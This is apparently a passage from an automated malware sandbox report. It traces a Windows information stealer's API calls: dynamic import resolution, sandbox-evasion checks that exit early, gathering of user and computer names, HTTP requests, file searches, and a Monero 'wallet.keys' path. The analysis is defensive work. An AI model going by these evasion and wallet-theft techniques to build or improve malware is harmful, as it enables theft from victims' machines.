                                        • GetProcAddress.KERNEL32(704D0000,009CA528), ref: 00CBA191
                                        • GetProcAddress.KERNEL32(704D0000,009DD1E8), ref: 00CBA1A9
                                        • GetProcAddress.KERNEL32(704D0000,009DD2C0), ref: 00CBA1C2
                                        • GetProcAddress.KERNEL32(704D0000,009C4FC8), ref: 00CBA1DA
                                        • GetProcAddress.KERNEL32(704D0000,009C5048), ref: 00CBA1F2
                                        • GetProcAddress.KERNEL32(704D0000,009DD188), ref: 00CBA20B
                                        • GetProcAddress.KERNEL32(768D0000,009C5008), ref: 00CBA22C
                                        • GetProcAddress.KERNEL32(768D0000,009C5348), ref: 00CBA244
                                        • GetProcAddress.KERNEL32(768D0000,009DD230), ref: 00CBA25D
                                        • GetProcAddress.KERNEL32(768D0000,009DD110), ref: 00CBA275
                                        • GetProcAddress.KERNEL32(768D0000,009C5088), ref: 00CBA28D
                                        • GetProcAddress.KERNEL32(75790000,009CA690), ref: 00CBA2B3
                                        • GetProcAddress.KERNEL32(75790000,009CA6E0), ref: 00CBA2CB
                                        • GetProcAddress.KERNEL32(75790000,009DD260), ref: 00CBA2E3
                                        • GetProcAddress.KERNEL32(75790000,009C50A8), ref: 00CBA2FC
                                        • GetProcAddress.KERNEL32(75790000,009C5148), ref: 00CBA314
                                        • GetProcAddress.KERNEL32(75790000,009CA618), ref: 00CBA32C
                                        • GetProcAddress.KERNEL32(75A10000,009DD140), ref: 00CBA352
                                        • GetProcAddress.KERNEL32(75A10000,009C51C8), ref: 00CBA36A
                                        • GetProcAddress.KERNEL32(75A10000,009D8C18), ref: 00CBA382
                                        • GetProcAddress.KERNEL32(75A10000,009DD278), ref: 00CBA39B
                                        • GetProcAddress.KERNEL32(75A10000,009DD290), ref: 00CBA3B3
                                        • GetProcAddress.KERNEL32(75A10000,009C5028), ref: 00CBA3CB
                                        • GetProcAddress.KERNEL32(75A10000,009C5208), ref: 00CBA3E4
                                        • GetProcAddress.KERNEL32(75A10000,009DD2A8), ref: 00CBA3FC
                                        • GetProcAddress.KERNEL32(75A10000,009DD038), ref: 00CBA414
                                        • GetProcAddress.KERNEL32(76850000,009C5268), ref: 00CBA436
                                        • GetProcAddress.KERNEL32(76850000,009DD158), ref: 00CBA44E
                                        • GetProcAddress.KERNEL32(76850000,009DD2F0), ref: 00CBA466
                                        • GetProcAddress.KERNEL32(76850000,009DD050), ref: 00CBA47F
                                        • GetProcAddress.KERNEL32(76850000,009DD068), ref: 00CBA497
                                        • GetProcAddress.KERNEL32(75690000,009C51E8), ref: 00CBA4B8
                                        • GetProcAddress.KERNEL32(75690000,009C5288), ref: 00CBA4D1
                                        • GetProcAddress.KERNEL32(769C0000,009C50C8), ref: 00CBA4F2
                                        • GetProcAddress.KERNEL32(769C0000,009DD098), ref: 00CBA50A
                                        • GetProcAddress.KERNEL32(6F8C0000,009C50E8), ref: 00CBA530
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5228), ref: 00CBA548
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5108), ref: 00CBA560
                                        • GetProcAddress.KERNEL32(6F8C0000,009DD5A8), ref: 00CBA579
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5188), ref: 00CBA591
                                        • GetProcAddress.KERNEL32(6F8C0000,009C4F88), ref: 00CBA5A9
                                        • GetProcAddress.KERNEL32(6F8C0000,009C51A8), ref: 00CBA5C2
                                        • GetProcAddress.KERNEL32(6F8C0000,009C5248), ref: 00CBA5DA
                                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00CBA5F1
                                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00CBA607
                                        • GetProcAddress.KERNEL32(75D90000,009DD578), ref: 00CBA629
                                        • GetProcAddress.KERNEL32(75D90000,009D8C78), ref: 00CBA641
                                        • GetProcAddress.KERNEL32(75D90000,009DD368), ref: 00CBA659
                                        • GetProcAddress.KERNEL32(75D90000,009DD500), ref: 00CBA672
                                        • GetProcAddress.KERNEL32(76470000,009C52A8), ref: 00CBA693
                                        • GetProcAddress.KERNEL32(6EDA0000,009DD4D0), ref: 00CBA6B4
                                        • GetProcAddress.KERNEL32(6EDA0000,009C5368), ref: 00CBA6CD
                                        • GetProcAddress.KERNEL32(6EDA0000,009DD5C0), ref: 00CBA6E5
                                        • GetProcAddress.KERNEL32(6EDA0000,009DD470), ref: 00CBA6FD
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 973cc9c39ccdadcb79aeb5459d19b6e568bedcf3861d8b214c717a023d9fc723
                                        • Instruction ID: 5a699504bb1e1ade664a15fed1326831be13067365ea39d19b1012cf4fb2580a
                                        • Opcode Fuzzy Hash: 973cc9c39ccdadcb79aeb5459d19b6e568bedcf3861d8b214c717a023d9fc723
                                        • Instruction Fuzzy Hash: 9E623DB5500288AFC358DFAAEDC89563BF9F74C30170D853EB605EB264D639B489CB16

                                         Control-flow Graph (basic blocks as id address-range: calls → successor ids; the rendered graph and its executed/not-executed colouring are not reproduced)
                                         • 1033 ca6280-ca630b: call cba7a0, call ca47b0, call cba740, InternetOpenA, StrCmpCA → 1040, 1041
                                         • 1040 ca630d → 1041
                                         • 1041 ca6314-ca6318 → 1042, 1043
                                         • 1043 ca631e-ca6342: InternetConnectA → 1044, 1045
                                         • 1044 ca6348-ca634c → 1047, 1048
                                         • 1048 ca634e-ca6358 → 1050
                                         • 1047 ca635a → 1050
                                         • 1050 ca6364-ca6392: HttpOpenRequestA → 1052, 1053
                                         • 1052 ca6398-ca639c → 1055, 1056
                                         • 1055 ca639e-ca63bf: InternetSetOptionA → 1056
                                         • 1056 ca63c5-ca6405: HttpSendRequestA, HttpQueryInfoA → 1058, 1059
                                         • 1059 ca6407-ca6427: call cba740, call cba800 × 2 → 1062
                                         • 1058 ca642c-ca644b: call cb8940 → 1066, 1067
                                         • 1067 ca644d-ca6454 → 1069, 1070
                                         • 1069 ca6456-ca6480: InternetReadFile → 1073, 1074
                                         • 1074 ca6482-ca6489 → 1073, 1079
                                         • 1073 ca648b → 1070
                                         • 1079 ca648d-ca64c5: call cba9b0, call cba8a0, call cba800 → 1069
                                         • 1070 ca64c7-ca64ef: InternetCloseHandle → 1053
                                         • 1066 ca64c9-ca64e9: call cba740, call cba800 × 2 → 1062
                                         • 1053 ca64f5-ca64f9: InternetCloseHandle → 1045
                                         • 1045 ca64ff-ca6503: InternetCloseHandle → 1042
                                         • 1042 ca6509-ca6525: call cba7a0, call cba800 × 2 → 1062
                                         • 1062 ca6528-ca652d (no successors)
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA6385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00CA63FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA646D
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA64EF
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA64F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA6503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 54d240771b8b9115aed768506e6f5ef1be74c073b7f9dd75b3e1821b889442a0
                                        • Instruction ID: 821f2eaaa3100daacce27fe94924fdfee6ba5dcf93bc0311264cfc71ad0c4119
                                        • Opcode Fuzzy Hash: 54d240771b8b9115aed768506e6f5ef1be74c073b7f9dd75b3e1821b889442a0
                                        • Instruction Fuzzy Hash: 82716E71A00218AFDB24DFA1CC89FEE7778BB49704F148168F10A6B1D0DBB56A89DF51

                                        Control-flow Graph (rendered graph omitted; entry block cb5510-cb5577, calls StrCmpCA and Sleep)
                                        APIs
                                          • Part of subcall function 00CBA820: lstrlen.KERNEL32(00CA4F05,?,?,00CA4F05,00CC0DDE), ref: 00CBA82B
                                          • Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0DDE,00000000), ref: 00CBA885
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB56A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5857
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5228
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5318
                                          • Part of subcall function 00CB52C0: lstrlen.KERNEL32(00000000), ref: 00CB532F
                                          • Part of subcall function 00CB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00CB5364
                                          • Part of subcall function 00CB52C0: lstrlen.KERNEL32(00000000), ref: 00CB5383
                                          • Part of subcall function 00CB52C0: lstrlen.KERNEL32(00000000), ref: 00CB53AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00CB5A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 0a980de386789ef7630d5d124b253e353bc46bcc807e15733f01f94594e87cc2
                                        • Instruction ID: d692b5450978ba25a32251e185c15fdbd5fdb348bd8573a1dc5599290a89b2e9
                                        • Opcode Fuzzy Hash: 0a980de386789ef7630d5d124b253e353bc46bcc807e15733f01f94594e87cc2
                                        • Instruction Fuzzy Hash: 6CE12F71910208AACB18FBA1DC96EFD737CAF54300F548128F556664D2EF356B0DEBA2

                                        Control-flow Graph (rendered graph omitted; entry block cb17a0-cb17cd, calls StrCmpCA and ExitProcess)
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00CB17C5
                                        • ExitProcess.KERNEL32 ref: 00CB17D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: e5b7ad57c99c756edc16a7d67616acb1051fabcff0390994cf0eceaad7b2abd6
                                        • Instruction ID: c1d30408971cdbfadef1f0d3a836b511b8be366a6af87ee958d25f8b4e363225
                                        • Opcode Fuzzy Hash: e5b7ad57c99c756edc16a7d67616acb1051fabcff0390994cf0eceaad7b2abd6
                                        • Instruction Fuzzy Hash: 45517EB4A00249EFCB04DFA1D9A8BFE77B5BF44340F14806CE816AB240D771EA45DB62

                                        Control-flow Graph (rendered graph omitted; entry block cb7500-cb754a, calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA)
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CB7542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7603
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB760A
                                        • wsprintfA.USER32 ref: 00CB7640
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 83a966d59de635146385181dc2708c8775676a659d7bcbd10076bcf98bd192c5
                                        • Instruction ID: 915a4fff43fbbfa63e48397389c6c7e686254387625858f9746856247c7c5782
                                        • Opcode Fuzzy Hash: 83a966d59de635146385181dc2708c8775676a659d7bcbd10076bcf98bd192c5
                                        • Instruction Fuzzy Hash: BE4182B1D04258AFDF10DFA4DC95BEEBBB8AF58700F140199F5097B280DB746A48CBA5

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1738), ref: 00CB98A1
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1768), ref: 00CB98BA
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1678), ref: 00CB98D2
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1618), ref: 00CB98EA
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1510), ref: 00CB9903
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D8B48), ref: 00CB991B
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009C55E8), ref: 00CB9933
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009C5408), ref: 00CB994C
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D16F0), ref: 00CB9964
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D16D8), ref: 00CB997C
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D15B8), ref: 00CB9995
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1690), ref: 00CB99AD
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009C5448), ref: 00CB99C5
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D15A0), ref: 00CB99DE
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CA11D0: ExitProcess.KERNEL32 ref: 00CA1211
                                          • Part of subcall function 00CA1160: GetSystemInfo.KERNEL32(?), ref: 00CA116A
                                          • Part of subcall function 00CA1160: ExitProcess.KERNEL32 ref: 00CA117E
                                          • Part of subcall function 00CA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CA112B
                                          • Part of subcall function 00CA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00CA1132
                                          • Part of subcall function 00CA1110: ExitProcess.KERNEL32 ref: 00CA1143
                                          • Part of subcall function 00CA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CA123E
                                          • Part of subcall function 00CA1220: __aulldiv.LIBCMT ref: 00CA1258
                                          • Part of subcall function 00CA1220: __aulldiv.LIBCMT ref: 00CA1266
                                          • Part of subcall function 00CA1220: ExitProcess.KERNEL32 ref: 00CA1294
                                          • Part of subcall function 00CB6770: GetUserDefaultLangID.KERNEL32 ref: 00CB6774
                                          • Part of subcall function 00CA1190: ExitProcess.KERNEL32 ref: 00CA11C6
                                          • Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
                                          • Part of subcall function 00CB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7887
                                          • Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F
                                          • Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7910
                                          • Part of subcall function 00CB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7917
                                          • Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB6AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00CB6AF9
                                        • Sleep.KERNEL32(00001770), ref: 00CB6B04
                                        • CloseHandle.KERNEL32(?,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6B1A
                                        • ExitProcess.KERNEL32 ref: 00CB6B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:

                                        Control-flow Graph (blocks marked Executed / Not Executed in the original figure)
                                        • 1436 ca1220-ca1247: call cb89b0, GlobalMemoryStatusEx → 1439, 1440
                                        • 1439 ca1249-ca1271: call cbda00 (x2) → 1442
                                        • 1440 ca1273-ca127a → 1442
                                        • 1442 ca1281-ca1285 → 1443, 1444
                                        • 1443 ca129a-ca129d
                                        • 1444 ca1287 → 1446, 1447
                                        • 1446 ca1289-ca1290 → 1443, 1447
                                        • 1447 ca1292-ca1294: ExitProcess
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CA123E
                                        • __aulldiv.LIBCMT ref: 00CA1258
                                        • __aulldiv.LIBCMT ref: 00CA1266
                                        • ExitProcess.KERNEL32 ref: 00CA1294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @

                                        Control-flow Graph (blocks marked Executed / Not Executed in the original figure)
                                        • 1450 cb6af3 → 1451
                                        • 1451 cb6b0a → 1453, 1454
                                        • 1453 cb6aba-cb6ad7: call cbaad0, OpenEventA → 1459, 1460
                                        • 1454 cb6b0c-cb6b22: call cb6920, call cb5b10, CloseHandle, ExitProcess
                                        • 1459 cb6ad9-cb6af1: call cbaad0, CreateEventA → 1454
                                        • 1460 cb6af5-cb6b04: CloseHandle, Sleep → 1451
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB6AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00CB6AF9
                                        • Sleep.KERNEL32(00001770), ref: 00CB6B04
                                        • CloseHandle.KERNEL32(?,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6B1A
                                        • ExitProcess.KERNEL32 ref: 00CB6B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA6280: InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
                                          • Part of subcall function 00CA6280: StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6303
                                          • Part of subcall function 00CA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
                                          • Part of subcall function 00CA6280: HttpOpenRequestA.WININET(00000000,GET,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA6385
                                          • Part of subcall function 00CA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
                                          • Part of subcall function 00CA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CA112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00CA1132
                                        • ExitProcess.KERNEL32 ref: 00CA1143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00CA10B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00CA10F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        APIs
                                          • Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7910
                                          • Part of subcall function 00CB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7917
                                          • Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F
                                          • Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
                                          • Part of subcall function 00CB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7887
                                          • Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F
                                        • ExitProcess.KERNEL32 ref: 00CA11C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        APIs
                                        • wsprintfA.USER32 ref: 00CB38CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00CB38E3
                                        • lstrcat.KERNEL32(?,?), ref: 00CB3935
                                        • StrCmpCA.SHLWAPI(?,00CC0F70), ref: 00CB3947
                                        • StrCmpCA.SHLWAPI(?,00CC0F74), ref: 00CB395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB3C67
                                        • FindClose.KERNEL32(000000FF), ref: 00CB3C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 1edee7ccaaf0f9c35ff179bdedb9de3b94c02ab27ca44810e43de36ee18a02f6
                                        • Instruction ID: 4eee8ccc6e1f21649f03888acf9f6bab10167b5982b45f15fd748a7495888126
                                        • Opcode Fuzzy Hash: 1edee7ccaaf0f9c35ff179bdedb9de3b94c02ab27ca44810e43de36ee18a02f6
                                        • Instruction Fuzzy Hash: 95A140B1A00258AFDB24DFA5DC85FEA7378BB45300F08459CF51DA6141EB75AB88CF62
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00CC0B32,00CC0B2B,00000000,?,?,?,00CC13F4,00CC0B2A), ref: 00CABEF5
                                        • StrCmpCA.SHLWAPI(?,00CC13F8), ref: 00CABF4D
                                        • StrCmpCA.SHLWAPI(?,00CC13FC), ref: 00CABF63
